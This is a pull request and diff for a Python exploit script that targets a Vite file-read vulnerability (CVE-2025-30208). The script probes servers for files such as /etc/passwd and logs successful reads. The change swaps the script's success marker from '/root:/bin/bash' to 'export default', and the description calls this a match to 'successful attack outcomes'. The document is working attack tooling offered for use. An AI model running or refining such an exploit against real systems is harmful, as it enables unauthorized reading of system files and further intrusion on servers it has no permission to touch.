### PR TITLE
Fix: Payload judgment condition

### DIFF
--- a/Vite-CVE-2025-30208-EXP.py
+++ b/Vite-CVE-2025-30208-EXP.py
@@ -70,7 +70,7 @@ def check_url(base_url, paths, proxy, output_file):
             if content:
                 if "/etc/passwd" in url:  # 如果是 /etc/passwd 路径，仅显示 SUCCESS
                     print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url}")
-                elif "/root:/bin/bash" in content:  # 如果包含 /root:/bin/bash，成功并保存到文件
+                elif "export default" in content:  # 如果包含 export default，成功并保存到文件
                     result = f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url}"
                     print(result)
                     # 输出到 output.txt 文件（追加模式）
@@ -115,7 +115,7 @@ def check_urls_from_dict(paths, proxy):
                 if content:
                     if "/etc/passwd" in path:  # 如果是 /etc/passwd 路径，仅显示 SUCCESS
                         print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {path}")
-                    elif "/root:/bin/bash" in content:  # 如果包含 /root:/bin/bash，成功并保存到文件
+                    elif "export default" in content:  # 如果包含 export default，成功并保存到文件
                         result = f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {path}"
                         print(result)
                         # 输出到 output.txt 文件（追加模式）


### PR DESCRIPTION
Adjust the payload evaluation criterion from `/root:/bin/bash` to `export default`, reflecting the stable string pattern observed in successful attack outcomes.